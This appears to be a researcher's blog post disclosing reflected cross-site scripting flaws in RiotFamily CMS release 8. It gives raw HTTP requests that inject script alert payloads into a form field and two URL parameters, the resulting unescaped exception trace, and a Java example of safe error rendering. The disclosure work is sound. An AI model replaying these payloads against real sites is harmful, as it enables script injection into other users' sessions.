RiotFamily release 8 XSS

After a few months of inactivity in security research, due to lack of time, I'm back, guys.

These days I'm playing with RiotFamily (release 8.0), a powerful JEE-based Content Management System developed by Felix Gnass and released to the public. It is built on rock-stable technologies that we all use when developing Java-based web apps, such as Spring, Hibernate, Freemarker, and DWR for Ajax.

They made a lot of improvements over the previous version 7, especially in the admin backend.

Well, I had the time to run it locally on my Tomcat instance and play a bit looking for security issues... here we go:

1. Reflected XSS in <yourApp>/riot/form/riotUser when adding a new user to the Riot backend. Following is the raw request, complete with the trivial attack vector I've used:

POST /riot8/riot/form/riotUser HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2009010711 Gentoo Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8080/riot8/riot/form/riotUser
Cookie: JSESSIONID=DE70D674365E74CDAD6CA176747FD244;
Content-Type: multipart/form-data; boundary=---------------------------169054938890117057438849259
Content-Length: 838
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="id"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="name"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="email"
aaa@aal.lo
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3-confirm"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="sites"
1f67g<sCript>alert(666)</ScriPt>74jhskm3
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p5"
Save
-----------------------------169054938890117057438849259--

As you can see, we've modified the original POST request (the one that adds a user to the DB), injecting after the value 1 of the form part "sites" (a normal checkbox) a malicious (even if only for test purposes) JavaScript payload that shows a 666 popup. It works even though it throws a java.lang.NumberFormatException.

This is basically the same problem I found in Eclipse BIRT a few months ago (now fixed): the exception trace is not escaped for HTML characters, as you can see here:

java.lang.NumberFormatException: For input string: "1f67g<sCript>alert(666)</ScriPt>74jhskm3"
 at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
 at java.lang.Integer.parseInt(Integer.java:456)
 at java.lang.Integer.parseInt(Integer.java:497)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement.updateSelection(AbstractMultiSelectElement.java:161)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement.processRequest(AbstractMultiSelectElement.java:141)
 at org.riotfamily.forms.CompositeElement.processRequestCompontents(CompositeElement.java:142)
 at org.riotfamily.forms.CompositeElement.processRequest(CompositeElement.java:131)
 at org.riotfamily.forms.Form.processRequest(Form.java:396)
 at org.riotfamily.forms.Form.processRequest(Form.java:387)
 at org.riotfamily.forms.controller.AbstractFormController.processForm(AbstractFormController.java:239)
 at org.riotfamily.forms.controller.AbstractFormController.handleFormRequest(AbstractFormController.java:132)
 at org.riotfamily.forms.controller.AjaxFormController.handleFormRequest(AjaxFormController.java:69)
 at org.riotfamily.forms.controller.AbstractFormController.handleRequest(AbstractFormController.java:123)
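The sink behind this trace, as an added Java example that is not RiotFamily's own code: Integer.parseInt copies the raw form value into the exception message, so an error view that writes the exception straight into the page turns form input into markup. The SafeErrorView class and its escapeHtml helper are assumptions; a real app would use its template engine's escaping or a library such as the OWASP Java Encoder.

```java
import java.util.Arrays;
import java.util.stream.Collectors;

// Added example (hypothetical class, not RiotFamily code): why an unescaped
// exception trace is an XSS sink, and how an error view should render it instead.
public class SafeErrorView {

    // Minimal HTML escaper for text nodes (hypothetical helper).
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // The pattern behind the report: the exception message carries the user's
    // input and is concatenated into the HTML error page as-is.
    static String renderUnsafe(Throwable t) {
        return "<pre>" + t + "</pre>";  // request-controlled text reaches the browser as markup
    }

    // Hardened rendering: message and frames are escaped as text, never emitted as markup.
    // (In production the trace should be logged server-side and not shown to users at all.)
    static String renderSafe(Throwable t) {
        String frames = Arrays.stream(t.getStackTrace())
                .map(f -> " at " + escapeHtml(f.toString()))
                .collect(Collectors.joining("\n"));
        return "<pre>" + escapeHtml(String.valueOf(t)) + "\n" + frames + "</pre>";
    }

    public static void main(String[] args) {
        // Constructed input standing in for the "sites" form field value.
        String sites = "1<script>alert(1)</script>";
        try {
            Integer.parseInt(sites); // the same parse that produced the NumberFormatException above
        } catch (NumberFormatException e) {
            System.out.println(renderUnsafe(e)); // contains a live <script> tag
            System.out.println(renderSafe(e));   // contains only &lt;script&gt;
        }
    }
}
```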

The same problem exists in the path servlet's request URI, in the objectId and subPage parameters:

GET /riot8/riot/path?editorId=messageBundleEntry&objectId=1o92<script>alert(1)</script>73j HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2009010711 Gentoo Firefox/3.0.5

[..]

GET /riot8/riot/path?editorId=dbMessages&subPage=importMessagesac210<script>alert(1)</script>748djna HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2009010711 Gentoo Firefox/3.0.5

Have fun guys…

euronymous
